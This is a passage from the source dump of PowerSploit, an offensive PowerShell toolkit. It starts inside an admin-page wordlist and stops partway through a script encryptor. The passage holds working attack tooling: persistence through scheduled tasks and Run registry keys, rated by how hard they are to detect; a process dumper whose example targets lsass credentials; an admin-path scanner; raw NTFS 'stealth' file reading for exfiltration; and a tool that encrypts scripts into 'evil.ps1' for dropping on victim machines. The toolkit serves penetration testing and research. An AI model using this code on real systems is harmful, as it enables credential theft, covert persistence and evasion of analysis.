186 | vadmind/ 187 | vmailadmin/ 188 | webadmin.asp 189 | webadmin.html 190 | webadmin.php 191 | webmaster/ 192 | websvn/ 193 | wizmysqladmin/ 194 | wp-admin/ 195 | wp-login/ 196 | xlogin/ 197 | yonetici.asp 198 | yonetici.html 199 | yonetici.php 200 | yonetim.asp 201 | yonetim.html 202 | yonetim.php -------------------------------------------------------------------------------- /Persistence/New-UserPersistenceOptions.ps1: -------------------------------------------------------------------------------- 1 | function New-UserPersistenceOptions 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Configure user-level persistence options for the Add-Persistence function. 7 | 8 | PowerSploit Function: New-UserPersistenceOptions 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | New-UserPersistenceOptions allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: scheduled task, registry. 17 | 18 | .PARAMETER ScheduledTask 19 | 20 | Persist via a scheduled task. 21 | 22 | Detection Difficulty: Moderate 23 | Removal Difficulty: Moderate 24 | User Detectable? No 25 | 26 | .PARAMETER Registry 27 | 28 | Persist via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user. 29 | 30 | Detection Difficulty: Easy 31 | Removal Difficulty: Easy 32 | User Detectable? Yes 33 | 34 | .PARAMETER AtLogon 35 | 36 | Starts the payload upon any user logon. 37 | 38 | .PARAMETER OnIdle 39 | 40 | Starts the payload after one minute of idling. 41 | 42 | .PARAMETER Daily 43 | 44 | Starts the payload daily. 45 | 46 | .PARAMETER At 47 | 48 | Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. 49 | 50 | .EXAMPLE 51 | 52 | C:\PS> $UserOptions = New-UserPersistenceOptions -Registry -AtLogon 53 | 54 | .EXAMPLE 55 | 56 | C:\PS> $UserOptions = New-UserPersistenceOptions -ScheduledTask -OnIdle 57 | 58 | .LINK 59 | 60 | http://www.exploit-monday.com 61 | #> 62 | 63 | [CmdletBinding()] Param ( 64 | [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] 65 | [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] 66 | [Switch] 67 | $ScheduledTask, 68 | 69 | [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] 70 | [Switch] 71 | $Registry, 72 | 73 | [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] 74 | [Switch] 75 | $Daily, 76 | 77 | [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] 78 | [DateTime] 79 | $At, 80 | 81 | [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] 82 | [Switch] 83 | $OnIdle, 84 | 85 | [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] 86 | [Switch] 87 | $AtLogon 88 | ) 89 | 90 | $PersistenceOptionsTable = @{ 91 | Method = '' 92 | Trigger = '' 93 | Time = '' 94 | } 95 | 96 | switch ($PSCmdlet.ParameterSetName) 97 | { 98 | 'ScheduledTaskAtLogon' 99 | { 100 | $PersistenceOptionsTable['Method'] = 'ScheduledTask' 101 | $PersistenceOptionsTable['Trigger'] = 'AtLogon' 102 | } 103 | 104 | 'ScheduledTaskOnIdle' 105 | { 106 | $PersistenceOptionsTable['Method'] = 'ScheduledTask' 107 | $PersistenceOptionsTable['Trigger'] = 'OnIdle' 108 | } 109 | 110 | 'ScheduledTaskDaily' 111 | { 112 | $PersistenceOptionsTable['Method'] = 'ScheduledTask' 113 | $PersistenceOptionsTable['Trigger'] = 'Daily' 114 | $PersistenceOptionsTable['Time'] = $At 115 | } 116 | 117 | 'Registry' 118 | { 119 | $PersistenceOptionsTable['Method'] = 'Registry' 120 | $PersistenceOptionsTable['Trigger'] = 'AtLogon' 121 | } 122 | } 123 | 124 | $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable 125 | $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.UserPersistenceOptions' 126 | 127 | Write-Output $PersistenceOptions 128 | } 129 | -------------------------------------------------------------------------------- /Exfiltration/Out-Minidump.ps1: -------------------------------------------------------------------------------- 1 | function Out-Minidump 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Generates a full-memory minidump of a process. 7 | 8 | PowerSploit Function: Out-Minidump 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | Out-Minidump writes a process dump file with all process memory to disk. 17 | This is similar to running procdump.exe with the '-ma' switch. 18 | 19 | .PARAMETER Process 20 | 21 | Specifies the process for which a dump will be generated. The process object 22 | is obtained with Get-Process. 23 | 24 | .PARAMETER DumpFilePath 25 | 26 | Specifies the path where dump files will be written. By default, dump files 27 | are written to the current working directory. Dump file names take following 28 | form: processname_id.dmp 29 | 30 | .EXAMPLE 31 | 32 | Out-Minidump -Process (Get-Process -Id 4293) 33 | 34 | Description 35 | ----------- 36 | Generate a minidump for process ID 4293. 37 | 38 | .EXAMPLE 39 | 40 | Get-Process lsass | Out-Minidump 41 | 42 | Description 43 | ----------- 44 | Generate a minidump for the lsass process. Note: To dump lsass, you must be 45 | running from an elevated prompt. 46 | 47 | .EXAMPLE 48 | 49 | Get-Process | Out-Minidump -DumpFilePath C:\temp 50 | 51 | Description 52 | ----------- 53 | Generate a minidump of all running processes and save them to C:\temp. 54 | 55 | .INPUTS 56 | 57 | System.Diagnostics.Process 58 | 59 | You can pipe a process object to Out-Minidump. 60 | 61 | .OUTPUTS 62 | 63 | System.IO.FileInfo 64 | 65 | .LINK 66 | 67 | http://www.exploit-monday.com/ 68 | #> 69 | 70 | [CmdletBinding()] 71 | Param ( 72 | [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)] 73 | [System.Diagnostics.Process] 74 | $Process, 75 | 76 | [Parameter(Position = 1)] 77 | [ValidateScript({ Test-Path $_ })] 78 | [String] 79 | $DumpFilePath = $PWD 80 | ) 81 | 82 | BEGIN 83 | { 84 | $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') 85 | $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') 86 | $Flags = [Reflection.BindingFlags] 'NonPublic, Static' 87 | $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) 88 | $MiniDumpWithFullMemory = [UInt32] 2 89 | } 90 | 91 | PROCESS 92 | { 93 | $ProcessId = $Process.Id 94 | $ProcessName = $Process.Name 95 | $ProcessHandle = $Process.Handle 96 | $ProcessFileName = "$($ProcessName)_$($ProcessId).dmp" 97 | 98 | $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName 99 | 100 | $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) 101 | 102 | $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, 103 | $ProcessId, 104 | $FileStream.SafeFileHandle, 105 | $MiniDumpWithFullMemory, 106 | [IntPtr]::Zero, 107 | [IntPtr]::Zero, 108 | [IntPtr]::Zero)) 109 | 110 | $FileStream.Close() 111 | 112 | if (-not $Result) 113 | { 114 | $Exception = New-Object ComponentModel.Win32Exception 115 | $ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))" 116 | 117 | # Remove any partially written dump files. For example, a partial dump will be written 118 | # in the case when 32-bit PowerShell tries to dump a 64-bit process. 119 | Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue 120 | 121 | throw $ExceptionMessage 122 | } 123 | else 124 | { 125 | Get-ChildItem $ProcessDumpPath 126 | } 127 | } 128 | 129 | END {} 130 | } 131 | -------------------------------------------------------------------------------- /Recon/Get-HttpStatus.ps1: -------------------------------------------------------------------------------- 1 | function Get-HttpStatus 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Returns the HTTP Status Codes and full URL for specified paths. 7 | 8 | PowerSploit Function: Get-HttpStatus 9 | Author: Chris Campbell (@obscuresec) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | A script to check for the existence of a path or file on a webserver. 17 | 18 | .PARAMETER Target 19 | 20 | Specifies the remote web host either by IP or hostname. 21 | 22 | .PARAMETER Path 23 | 24 | Specifies the remost host. 25 | 26 | .PARAMETER Port 27 | 28 | Specifies the port to connect to. 29 | 30 | .PARAMETER UseSSL 31 | 32 | Use an SSL connection. 33 | 34 | .EXAMPLE 35 | 36 | C:\PS> Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt | Select-Object {where StatusCode -eq 20*} 37 | 38 | .EXAMPLE 39 | 40 | C:\PS> Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL 41 | 42 | .NOTES 43 | 44 | HTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error 45 | 46 | .LINK 47 | 48 | http://obscuresecurity.blogspot.com 49 | http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html 50 | #> 51 | 52 | [CmdletBinding()] Param( 53 | [Parameter(Mandatory = $True)] 54 | [String] 55 | $Target, 56 | 57 | [String] 58 | [ValidateNotNullOrEmpty()] 59 | $Path = '.\Dictionaries\admin.txt', 60 | 61 | [Int] 62 | $Port, 63 | 64 | [Switch] 65 | $UseSSL 66 | ) 67 | 68 | if (Test-Path $Path) { 69 | 70 | if ($UseSSL -and $Port -eq 0) { 71 | # Default to 443 if SSL is specified but no port is specified 72 | $Port = 443 73 | } elseif ($Port -eq 0) { 74 | # Default to port 80 if no port is specified 75 | $Port = 80 76 | } 77 | 78 | $TcpConnection = New-Object System.Net.Sockets.TcpClient 79 | Write-Verbose "Path Test Succeeded - Testing Connectivity" 80 | 81 | try { 82 | # Validate that the host is listening before scanning 83 | $TcpConnection.Connect($Target, $Port) 84 | } catch { 85 | Write-Error "Connection Test Failed - Check Target" 86 | $Tcpconnection.Close() 87 | Return 88 | } 89 | 90 | $Tcpconnection.Close() 91 | } else { 92 | Write-Error "Path Test Failed - Check Dictionary Path" 93 | Return 94 | } 95 | 96 | if ($UseSSL) { 97 | $SSL = 's' 98 | # Ignore invalid SSL certificates 99 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True } 100 | } else { 101 | $SSL = '' 102 | } 103 | 104 | if (($Port -eq 80) -or ($Port -eq 443)) { 105 | $PortNum = '' 106 | } else { 107 | $PortNum = ":$Port" 108 | } 109 | 110 | # Check Http status for each entry in the doctionary file 111 | foreach ($Item in Get-Content $Path) { 112 | 113 | $WebTarget = "http$($SSL)://$($Target)$($PortNum)/$($Item)" 114 | $URI = New-Object Uri($WebTarget) 115 | 116 | try { 117 | $WebRequest = [System.Net.WebRequest]::Create($URI) 118 | $WebResponse = $WebRequest.GetResponse() 119 | $WebStatus = $WebResponse.StatusCode 120 | $ResultObject += $ScanObject 121 | $WebResponse.Close() 122 | } catch { 123 | $WebStatus = $Error[0].Exception.InnerException.Response.StatusCode 124 | 125 | if ($WebStatus -eq $null) { 126 | # Not every exception returns a StatusCode. 127 | # If that is the case, return the Status. 128 | $WebStatus = $Error[0].Exception.InnerException.Status 129 | } 130 | } 131 | 132 | $Result = @{ Status = $WebStatus; 133 | URL = $WebTarget} 134 | 135 | $ScanObject = New-Object -TypeName PSObject -Property $Result 136 | 137 | Write-Output $ScanObject 138 | 139 | } 140 | } 141 | -------------------------------------------------------------------------------- /Exfiltration/NTFSParser/NTFSParserDLL/NTFSParserDLL.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * 3 | * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek 4 | * 5 | * This program/include file is free software; you can redistribute it and/or 6 | * modify it under the terms of the GNU General Public License as published 7 | * by the Free Software Foundation; either version 2 of the License, or 8 | * (at your option) any later version. 9 | * 10 | * This program/include file is distributed in the hope that it will be 11 | * useful, but WITHOUT ANY WARRANTY; without even the implied warranty 12 | * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | * GNU General Public License for more details. 14 | */ 15 | // 16 | // This code uses libraries released under GPLv2(or later) written by cyb70289 17 | 18 | #include "stdafx.h" 19 | #include "NTFS.h" 20 | #include "NTFS_DataType.h" 21 | 22 | using namespace std; 23 | 24 | struct FileInfo_t 25 | { 26 | CNTFSVolume* volume; 27 | CFileRecord* fileRecord; 28 | CIndexEntry* indexEntry; 29 | CAttrBase* data; 30 | }; 31 | 32 | extern "C" HANDLE __declspec(dllexport) StealthOpenFile(char* filePathCStr) 33 | { 34 | FileInfo_t* fileInfo = new FileInfo_t; 35 | 36 | string filePath = string(filePathCStr); 37 | _TCHAR volumeName = filePath.at(0); 38 | 39 | fileInfo->volume = new CNTFSVolume(volumeName); 40 | if (!fileInfo->volume->IsVolumeOK()) 41 | { 42 | return NULL; 43 | } 44 | 45 | //Parse root directory 46 | fileInfo->fileRecord = new CFileRecord(fileInfo->volume); 47 | fileInfo->fileRecord->SetAttrMask(MASK_INDEX_ROOT | MASK_INDEX_ALLOCATION); 48 | 49 | if (!fileInfo->fileRecord->ParseFileRecord(MFT_IDX_ROOT)) 50 | { 51 | return NULL; 52 | } 53 | if (!fileInfo->fileRecord->ParseAttrs()) 54 | { 55 | return NULL; 56 | } 57 | 58 | //Find subdirectory 59 | fileInfo->indexEntry = new CIndexEntry; 60 | int dirs = filePath.find(_T('\\'), 0); 61 | int dire = filePath.find(_T('\\'), dirs+1); 62 | 63 | while (dire != string::npos) 64 | { 65 | string pathname = filePath.substr(dirs+1, dire-dirs-1); 66 | const _TCHAR* pathnameCStr = (const _TCHAR*)pathname.c_str(); 67 | if (fileInfo->fileRecord->FindSubEntry(pathnameCStr, *(fileInfo->indexEntry))) 68 | { 69 | if (!fileInfo->fileRecord->ParseFileRecord(fileInfo->indexEntry->GetFileReference())) 70 | { 71 | return NULL; 72 | } 73 | 74 | if (!fileInfo->fileRecord->ParseAttrs()) 75 | { 76 | if (fileInfo->fileRecord->IsCompressed()) 77 | { 78 | return NULL; 79 | } 80 | else if (fileInfo->fileRecord->IsEncrypted()) 81 | { 82 | return NULL; 83 | } 84 | else 85 | { 86 | return NULL; 87 | } 88 | } 89 | } 90 | else 91 | { 92 | return NULL; 93 | } 94 | 95 | 96 | dirs = dire; 97 | dire = filePath.find(_T('\\'), dirs+1); 98 | } 99 | 100 | string fileName = filePath.substr(dirs+1, filePath.size()-1); 101 | const _TCHAR* fileNameCStr = (const _TCHAR*)fileName.c_str(); 102 | if (fileInfo->fileRecord->FindSubEntry(fileNameCStr, *(fileInfo->indexEntry))) 103 | { 104 | if (!fileInfo->fileRecord->ParseFileRecord(fileInfo->indexEntry->GetFileReference())) 105 | { 106 | return NULL; 107 | } 108 | 109 | fileInfo->fileRecord->SetAttrMask(MASK_DATA); 110 | if (!fileInfo->fileRecord->ParseAttrs()) 111 | { 112 | return NULL; 113 | } 114 | 115 | fileInfo->data = (CAttrBase*)fileInfo->fileRecord->FindStream(); 116 | 117 | return fileInfo; 118 | } 119 | 120 | return NULL; 121 | } 122 | 123 | 124 | extern "C" DWORD __declspec(dllexport) StealthReadFile(FileInfo_t* fileInfo, BYTE* buffer, DWORD bufferSize, ULONGLONG offset, DWORD* bytesRead, ULONGLONG* dataRemaining) 125 | { 126 | 127 | if (fileInfo->data) 128 | { 129 | ULONGLONG dataLength = (ULONGLONG)fileInfo->data->GetDataSize(); 130 | ULONGLONG fullDataLength = dataLength; 131 | 132 | dataLength = dataLength - offset; 133 | if (dataLength > bufferSize) 134 | { 135 | dataLength = bufferSize; 136 | } 137 | if (dataLength > MAXUINT32) 138 | { 139 | return 1; 140 | } 141 | 142 | DWORD len; 143 | if (fileInfo->data->ReadData(offset, buffer, dataLength, &len) && len == dataLength) 144 | { 145 | *bytesRead = len; 146 | *dataRemaining = fullDataLength - len - offset; 147 | return 0; //Success 148 | } 149 | return 3; 150 | } 151 | return 2; 152 | } 153 | 154 | 155 | extern "C" void __declspec(dllexport) StealthCloseFile(FileInfo_t* fileInfo) 156 | { 157 | delete (fileInfo->data); 158 | delete (fileInfo->indexEntry); 159 | delete (fileInfo->volume); 160 | delete fileInfo; 161 | } 162 | -------------------------------------------------------------------------------- /ReverseEngineering/Get-MethodAddress.ps1: -------------------------------------------------------------------------------- 1 | function Get-MethodAddress 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Get the unmanaged function address of a .NET method. 7 | 8 | PowerSploit Function: Get-MethodAddress 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | Get-MethodAddress aids in the process of reverse engineering and exploitation by returning an unmanaged function pointer to any .NET method. This method is useful for those interested in seeing what JITed MSIL opcodes look like in their assembly language representation. 17 | 18 | For example, here is the MSIL representation of [System.IntPtr].ToPointer: 19 | 0x02 ldarg.0 20 | 0x7B,0x53,0x04,0x00,0x04 ldfld void* System.IntPtr::m_value 21 | 0x2A ret 22 | 23 | After calling Get-MethodAddress and inspecting it in WinDbg, here is the x86_64 ASM representation: 24 | C:\PS> Get-MethodAddress ([IntPtr].GetMethod('ToPointer')) 25 | 0x000007FF35544CC0 26 | 27 | mscorlib_ni+0xd04cc0: 28 | 000007ff`35544cc0 488b01 mov rax,qword ptr [rcx] 29 | 000007ff`35544cc3 c3 ret 30 | 000007ff`35544cc4 cc int 3 31 | 32 | This MSIL to ASM translation makes sense because all the assembly instructions are doing is dereferencing the pointer in rcx. 33 | 34 | .PARAMETER MethodInfo 35 | 36 | The method whose unmanaged address will be returned. 37 | 38 | .EXAMPLE 39 | 40 | C:\PS> Get-MethodAddress ([String].GetMethod('Trim', [Type[]]@())) 41 | 42 | Description 43 | ----------- 44 | Returns the unmanaged address of [System.Object].Trim() method. 45 | 46 | .EXAMPLE 47 | 48 | C:\PS> [Int].Module.GetTypes().GetMethods() | ForEach-Object {Get-MethodAddress $_ -ErrorAction SilentlyContinue -WarningAction SilentlyContinue} 49 | 50 | Description 51 | ----------- 52 | Returns an unmanaged address for every method (in which an address can be returned) in mscorlib. 53 | 54 | .OUTPUTS 55 | 56 | System.String 57 | 58 | A hexadecimal representation of the method address. 59 | 60 | .NOTES 61 | 62 | Not all methods will be able to return an address. For example, methods with implementation flags of AggressiveInlining, Synchronized, or CodeTypeMask will not return an address. Also note that any InternalCall method will return the same pointer every time because the CLR determines its address at runtime. 63 | 64 | Lastly, note that the MSIL opcodes used to implement this cmdlet are unverifiable. This means for example, that this technique won't aid exploiting Silverlight applications. :'( 65 | 66 | .LINK 67 | 68 | http://www.exploit-monday.com/2012/11/Get-MethodAddress.html 69 | #> 70 | 71 | [CmdletBinding()] Param ( 72 | [Parameter(Mandatory = $True, ValueFromPipeline = $True)] 73 | [System.Reflection.MethodInfo] 74 | $MethodInfo 75 | ) 76 | 77 | if ($MethodInfo.MethodImplementationFlags -eq 'InternalCall') 78 | { 79 | Write-Warning "$($MethodInfo.Name) is an InternalCall method. These methods always point to the same address." 80 | } 81 | 82 | if ([IntPtr]::Size -eq 4) 83 | { 84 | $ReturnType = [UInt32] 85 | } 86 | else 87 | { 88 | $ReturnType = [UInt64] 89 | } 90 | 91 | $Domain = [AppDomain]::CurrentDomain 92 | $DynAssembly = New-Object System.Reflection.AssemblyName('MethodLeakAssembly') 93 | # Assemble in memory 94 | $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) 95 | $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('MethodLeakModule') 96 | $TypeBuilder = $ModuleBuilder.DefineType('MethodLeaker', [System.Reflection.TypeAttributes]::Public) 97 | # Declaration of the LeakMethod method 98 | $MethodBuilder = $TypeBuilder.DefineMethod('LeakMethod', [System.Reflection.MethodAttributes]::Public -bOr [System.Reflection.MethodAttributes]::Static, $ReturnType, $null) 99 | $Generator = $MethodBuilder.GetILGenerator() 100 | 101 | # Push unmanaged pointer to MethodInfo onto the evaluation stack 102 | $Generator.Emit([System.Reflection.Emit.OpCodes]::Ldftn, $MethodInfo) 103 | $Generator.Emit([System.Reflection.Emit.OpCodes]::Ret) 104 | 105 | # Assemble everything 106 | $Type = $TypeBuilder.CreateType() 107 | $Method = $Type.GetMethod('LeakMethod') 108 | 109 | try 110 | { 111 | # Call the method and return its JITed address 112 | $Address = $Method.Invoke($null, @()) 113 | 114 | Write-Output (New-Object IntPtr -ArgumentList $Address) 115 | } 116 | catch [System.Management.Automation.MethodInvocationException] 117 | { 118 | Write-Error "$($MethodInfo.Name) cannot return an unmanaged address." 119 | } 120 | } 121 | -------------------------------------------------------------------------------- /CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | 14 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3} 15 | Win32Proj 16 | ExeToInjectInTo 17 | 18 | 19 | 20 | Application 21 | true 22 | v110 23 | Unicode 24 | 25 | 26 | Application 27 | false 28 | v110 29 | true 30 | Unicode 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | true 44 | 45 | 46 | false 47 | 48 | 49 | 50 | Use 51 | Level3 52 | Disabled 53 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 54 | true 55 | 56 | 57 | Console 58 | true 59 | 60 | 61 | 62 | 63 | Level3 64 | Use 65 | MaxSpeed 66 | true 67 | true 68 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 69 | true 70 | 71 | 72 | Console 73 | true 74 | true 75 | true 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | Create 89 | Create 90 | 91 | 92 | 93 | 94 | 95 | -------------------------------------------------------------------------------- /Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.cpp: -------------------------------------------------------------------------------- 1 | // LogonUser.cpp : Defines the entry point for the console application. 2 | // 3 | 4 | #include "stdafx.h" 5 | 6 | using namespace std; 7 | 8 | size_t wcsByteLen( const wchar_t* str ); 9 | void InitUnicodeString( UNICODE_STRING& str, const wchar_t* value, BYTE* buffer, size_t& offset ); 10 | PVOID CreateNtlmLogonStructure(wstring domain, wstring username, wstring password, DWORD* size); 11 | size_t WriteUnicodeString(wstring str, UNICODE_STRING* uniStr, PVOID baseAddress, size_t offset); 12 | 13 | int _tmain(int argc, _TCHAR* argv[]) 14 | { 15 | //Get a handle to LSA 16 | HANDLE hLSA = NULL; 17 | NTSTATUS status = LsaConnectUntrusted(&hLSA); 18 | if (status != 0) 19 | { 20 | cout << "Error calling LsaConnectUntrusted. Error code: " << status << endl; 21 | return -1; 22 | } 23 | if (hLSA == NULL) 24 | { 25 | cout << "hLSA is NULL, this shouldn't ever happen" << endl; 26 | return -1; 27 | } 28 | 29 | //Build LsaLogonUser parameters 30 | LSA_STRING originName = {}; 31 | char originNameStr[] = "qpqp"; 32 | originName.Buffer = originNameStr; 33 | originName.Length = (USHORT)strlen(originNameStr); 34 | originName.MaximumLength = originName.Length; 35 | 36 | ULONG authPackage = 0; 37 | PLSA_STRING authPackageName = new LSA_STRING(); 38 | char authPackageBuf[] = MSV1_0_PACKAGE_NAME; 39 | authPackageName->Buffer = authPackageBuf; 40 | authPackageName->Length = (USHORT)strlen(authPackageBuf); 41 | authPackageName->MaximumLength = (USHORT)strlen(authPackageBuf); 42 | status = LsaLookupAuthenticationPackage(hLSA, authPackageName, &authPackage); 43 | if (status != 0) 44 | { 45 | int winError = LsaNtStatusToWinError(status); 46 | cout << "Call to LsaLookupAuthenticationPackage failed. Error code: " << winError; 47 | return -1; 48 | } 49 | 50 | DWORD authBufferSize = 0; 51 | PVOID authBuffer = CreateNtlmLogonStructure(L"VMWORKSTATION", L"testuser", L"Password1", &authBufferSize); 52 | cout << "authBufferSize: " << authBufferSize << endl; 53 | 54 | //Get TokenSource 55 | HANDLE hProcess = GetCurrentProcess();//todo 56 | HANDLE procToken = NULL; 57 | BOOL success = OpenProcessToken(hProcess, TOKEN_ALL_ACCESS, &procToken); 58 | if (!success) 59 | { 60 | DWORD errorCode = GetLastError(); 61 | cout << "Call to OpenProcessToken failed. Errorcode: " << errorCode << endl; 62 | return -1; 63 | } 64 | 65 | TOKEN_SOURCE tokenSource = {}; 66 | DWORD realSize = 0; 67 | success = GetTokenInformation(procToken, TokenSource, &tokenSource, sizeof(tokenSource), &realSize); 68 | if (!success) 69 | { 70 | cout << "Call to GetTokenInformation failed." << endl; 71 | return -1; 72 | } 73 | 74 | 75 | //Misc 76 | PVOID profileBuffer = NULL; 77 | ULONG profileBufferSize = 0; 78 | LUID loginId; 79 | HANDLE token = NULL; 80 | QUOTA_LIMITS quotaLimits; 81 | NTSTATUS subStatus = 0; 82 | 83 | status = LsaLogonUser(hLSA, 84 | &originName, 85 | RemoteInteractive, 86 | authPackage, 87 | authBuffer, 88 | authBufferSize, 89 | 0, 90 | &tokenSource, 91 | &profileBuffer, 92 | &profileBufferSize, 93 | &loginId, 94 | &token, 95 | "aLimits, 96 | &subStatus); 97 | 98 | if (status != 0) 99 | { 100 | NTSTATUS winError = LsaNtStatusToWinError(status); 101 | cout << "Error calling LsaLogonUser. Error code: " << winError << endl; 102 | return -1; 103 | } 104 | 105 | cout << "Success!" << endl; 106 | 107 | return 1; 108 | } 109 | 110 | //size will be set to the size of the structure created 111 | PVOID CreateNtlmLogonStructure(wstring domain, wstring username, wstring password, DWORD* size) 112 | { 113 | size_t wcharSize = sizeof(wchar_t); 114 | 115 | size_t totalSize = sizeof(MSV1_0_INTERACTIVE_LOGON) + ((domain.length() + username.length() + password.length()) * wcharSize); 116 | MSV1_0_INTERACTIVE_LOGON* ntlmLogon = (PMSV1_0_INTERACTIVE_LOGON)(new BYTE[totalSize]); 117 | size_t offset = sizeof(MSV1_0_INTERACTIVE_LOGON); 118 | 119 | ntlmLogon->MessageType = MsV1_0InteractiveLogon; 120 | offset += WriteUnicodeString(domain, &(ntlmLogon->LogonDomainName), ntlmLogon, offset); 121 | offset += WriteUnicodeString(username, &(ntlmLogon->UserName), ntlmLogon, offset); 122 | offset += WriteUnicodeString(password, &(ntlmLogon->Password), ntlmLogon, offset); 123 | 124 | *size = (DWORD)totalSize; //If the size is bigger than a DWORD, there is a gigantic bug somewhere. 125 | return ntlmLogon; 126 | } 127 | 128 | size_t WriteUnicodeString(wstring str, UNICODE_STRING* uniStr, PVOID baseAddress, size_t offset) 129 | { 130 | const wchar_t* buffer = str.c_str(); 131 | size_t size = str.length() * sizeof(wchar_t); 132 | uniStr->Length = (USHORT)size; 133 | uniStr->MaximumLength = (USHORT)size; 134 | uniStr->Buffer = (PWSTR)((UINT_PTR)baseAddress + offset); 135 | memcpy((PVOID)((UINT_PTR)baseAddress + offset), str.c_str(), size); 136 | return size; 137 | } -------------------------------------------------------------------------------- /ScriptModification/Out-EncryptedScript.ps1: -------------------------------------------------------------------------------- 1 | function Out-EncryptedScript 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Encrypts text files/scripts. 7 | 8 | PowerSploit Function: Out-EncryptedScript 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | Out-EncryptedScript will encrypt a script (or any text file for that matter) and output the results to a minimally obfuscated script - evil.ps1. 17 | 18 | .PARAMETER ScriptPath 19 | 20 | Path to this script 21 | 22 | .PARAMETER Password 23 | 24 | Password to encrypt/decrypt the script 25 | 26 | .PARAMETER Salt 27 | 28 | Salt value for encryption/decryption. This can be any string value. 29 | 30 | .EXAMPLE 31 | 32 | C:\PS> Out-EncryptedScript .\Naughty-Script.ps1 password salty 33 | 34 | Description 35 | ----------- 36 | Encrypt the contents of this file with a password and salt. This will make analysis of the script impossible without the correct password and salt combination. This command will generate evil.ps1 that can dropped onto the victim machine. It only consists of a decryption function 'de' and the base64-encoded ciphertext. 37 | 38 | .EXAMPLE 39 | 40 | C:\PS> [String] $cmd = Get-Content .\evil.ps1 41 | C:\PS> Invoke-Expression $cmd 42 | C:\PS> $decrypted = de password salt 43 | C:\PS> Invoke-Expression $decrypted 44 | 45 | Description 46 | ----------- 47 | This series of instructions assumes you've already encrypted a script and named it evil.ps1. The contents are then decrypted and the unencrypted script is called via Invoke-Expression 48 | 49 | .NOTES 50 | 51 | This command can be used to encrypt any text-based file/script 52 | 53 | .LINK 54 | 55 | http://www.exploit-monday.com 56 | #> 57 | 58 | [CmdletBinding()] Param ( 59 | [Parameter(Position = 0, Mandatory = $True)] 60 | [String] 61 | $ScriptPath, 62 | 63 | [Parameter(Position = 1, Mandatory = $True)] 64 | [String] 65 | $Password, 66 | 67 | [Parameter(Position = 2, Mandatory = $True)] 68 | [String] 69 | $Salt, 70 | 71 | [Parameter(Position = 3)] 72 | [String] 73 | $InitializationVector = ( @( foreach ($i in 1..16) { [Char](Get-Random -Min 0x41 -Max 0x5B) } ) -join '' ), # Generate random 16 character IV 74 | 75 | [Parameter(Position = 4)] 76 | [String] 77 | $FilePath = '.\evil.ps1' 78 | ) 79 | 80 | $AsciiEncoder = New-Object System.Text.ASCIIEncoding 81 | $ivBytes = $AsciiEncoder.GetBytes("CRACKMEIFYOUCAN!") 82 | # 